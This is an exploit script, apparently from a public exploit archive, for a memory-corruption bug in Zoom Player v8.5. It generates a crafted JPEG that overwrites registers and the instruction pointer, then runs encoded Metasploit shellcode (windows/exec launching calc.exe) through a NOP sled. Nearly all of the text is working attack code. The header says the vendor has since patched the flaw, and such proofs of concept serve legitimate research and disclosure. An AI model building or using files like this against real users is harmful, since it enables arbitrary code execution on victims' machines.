# Exploit Title: Inmatrix Ltd. Zoom Player Crafted JPEG File Memory Corruption and Arbitrary Code Execution Exploit. # Version: Zoom Player v8.5 # Date: 09-1-2013 # Author: Debasish Mandal. # Blog : http://www.debasish.in/ # Software Link: http://www.inmatrix.com/files/zoomplayer_download.shtml # Vendor Homepage: http://www.inmatrix.com/ # Category: Local # Tested on: Windows XP SP2. # Vendor Patch: This issue is patched and affected version is removed from site. # http://forum.inmatrix.com/index.php?showtopic=13904 d = "\xA3\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x01\x00\x60\x00\x60\x00\x00\xFF\xED\x18\x2E\x50\x68\x6F\x74\x6F\x73\x68\x6F\x70\x20\x33\x2E\x30\x00\x38\x42\x49\x4D\x03\xED\x0A\x52\x65\x73\x6F\x6C\x75\x74\x69\x6F\x6E\x00\x00\x00\x00\x10\x00\x60\x00\x00\x00\x01\x00\x01\x00\x60\x00\x00\x00\x01\x00\x01\x38\x42\x49\x4D\x04\x0D\x18\x46\x58\x20\x47\x6C\x6F\x62\x61\x6C\x20\x4C\x69\xE5\x68\x74\x69\x6E\x67\x20\x41\x6E\x67\x6C\x65\x00\x00\x00\x00\x04\x00\x00\x00\x78\x38\x42\x49\x4D\x04\x19\x12\x46\x58\x20\x47\x6C\x6F\x89\x61\x6C\x20\x41\x6C\x74\x69\x74\x75\x64\x65\x00\x00\x00\x00\x04\x00\x00\x00\x1E\x38\x42\x49\x4D\x03\xF3\x0B\x50\x72\x69\x6E\x74\x20\x46\x6C\x61\x67\x73\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x38\x42\x49\x4D\x04\x0A\x0E\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x20\x46\xA7\x61\x67\x00\x00\x00\x00\x01\x00\x00\x38\x42\x49\x4D\x27\x10\x14\x4A\x61\x70\x61\x6E\x65\x73\x65\x20\x50\x72\x69\x6E\x74\x20\x46\x6C\x61\x67\x73\x00\x00\x00\x00\x0A\x00\x01\x00\x00\x00\x39\x00\x00\x00\x02\x38\x42\x49\x4D\x03\xF5\x17\x43\x6F\x6C\x6F\x72\x20\x48\x61\x6C\x66\x74\x6F\x6E\x65\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x00\x00\x00\x48\x00\x2F\x66\x66\x00\x01\x00\x6C\x66\x66\x00\x06\x00\x00\x00\x00\x00\x01\x00\x2F\x66\x66\x00\x01\x00\xA1\x99\x9A\x00\x06\x00\x00\x00\x00\x00\x01\x00\x32\x00\x00\x00\x01\x00\x5A\x00\x00\x00\x06\x00\x00\x00\x00\x68\x01\x00\x35\x00\x00\x00\x01\x00\x2D\x00\x00\x00\x06\x00\x00\x00\x00\xA1\x01\x38\x42\x49\x4D\x03\xF8\x17\x43\x6F\x6C\x6F\x72\x20\x54\x72\x61\x6E\x73\x66\x65\x72\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x00\x00\x00\x70\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xB5\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x9D\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x38\x42\x49\x4D\x04\x08\x06\x47\x75\x69\x64\x65\x73\x00\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x02\x40\x00\x00\x02\x40\x00\x00\x00\x00\x38\x42\x49\x45\x04\x1E\x0D\x55\x52\x4C\x20\x6F\x76\x65\x72\x72\x69\x64\x65\x73\x00\x00\x00\x04\x00\x00\x00\x00\x38\x42\x49\x4D\x04\x1A\x06\x53\x6C\x69\x63\x65\x73\x00\x00\x00\x00\x75\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x58\x00\x00\x03\x20\xBC\x00\x00\x0A\x00\x55\x00\x6E\x00\x74\x00\x69\x00\x74\x00\x6C\x00\x65\x00\x64\x00\x2D\x00\x31\x00\x00\x00\x01\x00\x49\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x00\x00\x02\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x42\x49\x4D\x04\x11\x11\x49\x43\x43\x20\x55\x6E\x74\x61\x67\x67\x65\x64\x20\x46\x6C\x61\x67\x00\x00\x00\x01\x01\x00\x38\x42\x49\x4D\x04\x14\x17\x4C\x61\x79\x65\x72\x20\x49\x44\x20\x47\x65\x6E\x65\x72\x15\x74\x6F\x72\x20\x42\x61\x73\x65\x00\x00\x00\x04\x00\x00\x00\x02\x38\x42\x49\x4D\x04\x0C\x15\x4E\x65\x77\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x54\x8E\x75\x6D\x62\x6E\x61\x69\x6C\x00\x00\x14\x86\x00\x00\x00\x01\x00\x00\x00\x70\x00\x00\x00\x54\x00\x00\x01\x50\x00\x00\x6E\x40\x00\x00\x14\x6A\x00\x18\x00\x01\xFF\xD8\xAE\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x01\x00\x48\x00\x48\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00\x00\x01\xFF\xDB\x00\x84\x00\x0C\x08\x08\x08\x09\x08\x0C\x09\x09\x0C\x11\x0B\x0A\x0B\x11\x15\x0F\x0C\x0C\x0F\x15\x18\x13\x13\x15\x13\x13\x18\x11\x0C\x0C\x0C\x0C\x0C\x0C\x11\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01\x0D\x0B\x6A\x0D\x0E\x0D\x10\x0E\x0E\x10\x14\x0E\x0E\x0E\x14\x14\x0E\x0E\x0E\x0E\x14\x11\x0C\x0C\x0C\x0C\x0C\x11\x11\x0C\x0C\x0C\x0C\x0C\x0C\x11\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\xFF\xC0\x00\x11\x08\x00\x54\x00\x70\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xFF\xDD\x00\x d += "\x86\xf4\x12\x00" #EBX d += "\x42"*24 #Padding d += "\x86\xf4\x12\x00" #EBX d += "\x43"*8 #Padding d += "\xA6\xF4\x12\x00" #EIP - > 0012F4A6 on Stack d += "\x50"*12 #Padding d += "\x86\xf4\x12\x00" #EAX d += "\x90"*10 #NOPs #windows/exec - 227 bytes #http://www.metasploit.com #Encoder: x86/shikata_ga_nai #EXITFUNC=process, CMD=calc.exe, VERBOSE=false d += ("\xbd\x86\x9f\x31\x9b\xdb\xdf\xd9\x74\x24\xf4\x58\x31\xc9\xb1" "\x33\x83\xc0\x04\x31\x68\x0e\x03\xee\x91\xd3\x6e\x12\x45\x9a" "\x91\xea\x96\xfd\x18\x0f\xa7\x2f\x7e\x44\x9a\xff\xf4\x08\x17" "\x8b\x59\xb8\xac\xf9\x75\xcf\x05\xb7\xa3\xfe\x96\x79\x6c\xac" "\x55\x1b\x10\xae\x89\xfb\x29\x61\xdc\xfa\x6e\x9f\x2f\xae\x27" "\xd4\x82\x5f\x43\xa8\x1e\x61\x83\xa7\x1f\x19\xa6\x77\xeb\x93" "\xa9\xa7\x44\xaf\xe2\x5f\xee\xf7\xd2\x5e\x23\xe4\x2f\x29\x48" "\xdf\xc4\xa8\x98\x11\x24\x9b\xe4\xfe\x1b\x14\xe9\xff\x5c\x92" "\x12\x8a\x96\xe1\xaf\x8d\x6c\x98\x6b\x1b\x71\x3a\xff\xbb\x51" "\xbb\x2c\x5d\x11\xb7\x99\x29\x7d\xdb\x1c\xfd\xf5\xe7\x95\x00" "\xda\x6e\xed\x26\xfe\x2b\xb5\x47\xa7\x91\x18\x77\xb7\x7d\xc4" "\xdd\xb3\x6f\x11\x67\x9e\xe5\xe4\xe5\xa4\x40\xe6\xf5\xa6\xe2" "\x8f\xc4\x2d\x6d\xd7\xd8\xe7\xca\x27\x93\xaa\x7a\xa0\x7a\x3f" "\x3f\xad\x7c\x95\x03\xc8\xfe\x1c\xfb\x2f\x1e\x55\xfe\x74\x98" "\x85\x72\xe4\x4d\xaa\x21\x05\x44\xc9\xa4\x95\x04\x20\x43\x1e" "\xae\x3c") raw_input('[*] Press Enter to generate the malicious JPEG file: ') f = open('mal.jpg','w') f.write(d) f.close() print "[*] Malicious JPEG File generated Successfully.."